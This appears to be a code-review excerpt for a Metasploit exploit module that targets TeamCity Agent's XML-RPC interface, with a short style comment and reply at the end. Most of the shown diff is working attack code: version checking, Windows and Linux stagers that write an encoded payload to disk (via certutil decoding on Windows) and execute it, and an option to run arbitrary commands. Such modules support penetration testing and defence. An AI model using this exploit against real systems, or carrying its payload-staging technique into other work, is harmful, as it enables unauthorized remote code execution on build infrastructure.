modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb

```diff
@@ -0,0 +1,717 @@
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 14 2015'))
+
+    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH', 'VHOST')
+    register_options(
+      [
+        Opt::RPORT(9090),
+        OptString.new(
+          'CMD',
+          [false, 'Execute this command instead of using command stager', '']
+        )
+      ]
+    )
+  end
+
+  def check
+    version = determine_version
+    if !version.nil? && version >= 15772
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    version = determine_version
+    if version.nil?
+      fail_with(Failure::NoTarget, 'Could not determine TeamCity Agent version')
+    else
+      print_status("Found TeamCity Agent running build version #{version}")
+    end
+
+    unless datastore['CMD'].blank?
+      print_status('Executing user supplied command')
+      execute_command(datastore['CMD'], version)
+      return
+    end
+
+    case target['Platform']
+    when 'linux'
+      linux_stager(version)
+    when 'win'
+      windows_stager(version)
+    else
+      fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    end
+  end
+
+  def windows_stager(version)
+    print_status('Constructing Windows payload')
+
+    exe_payload = generate_payload_exe
+    exe_name = Rex::Text.rand_text_alpha(8)
+    b64_exe_payload = Rex::Text.encode_base64(exe_payload)
+
+    # Split payload into chunks so we can echo it into a file
+    split_payload = b64_exe_payload.scan(/.{1,2000}/m)
+    commands = split_payload.map { |x| "echo|set /p=\"#{x}\" >> #{exe_name}.b64" }
+    echo_file = commands.join("\n")
+
+    script_content = %(
+      #{echo_file}
+      certutil -decode #{exe_name}.b64 #{exe_name}.exe
+      start "" %cd%\\#{exe_name}.exe
+    )
+    xml_payload = build_request(script_content.strip!, version)
+
+    if !xml_payload.nil?
+      print_status("Found compatible build config for TeamCity build #{version}")
+      send_request(xml_payload)
+    else
+      fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
+    end
+  end
+
+  def linux_stager(version)
+    print_status('Constructing Linux payload')
+
+    exe_payload = generate_payload_exe
+    exe_name = Rex::Text.rand_text_alpha(8)
+    exe_payload_encoded = Rex::Text.to_hex(exe_payload)
+
+    script_content = %(
+      echo -n -e '#{exe_payload_encoded}' > #{exe_name}
+      chmod +x #{exe_name}
+      ./#{exe_name} &amp;
+    )
+    xml_payload = build_request(script_content.strip!, version)
+
+    if !xml_payload.nil?
+      print_status("Found compatible build config for TeamCity build #{version}")
+      send_request(xml_payload)
+    else
+      fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
+    end
+  end
+
+  def execute_command(cmd, version)
+    xml_payload = build_request(cmd, version)
+
+    if !xml_payload.nil?
```

Comment:
This conditional would be cleaner written as:

```ruby
    if xml_payload.nil?
      fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
    end

    print_status("Found compatible build config for TeamCity build #{version}")
    send_request(xml_payload)
```

Reply:
Good call, fixed.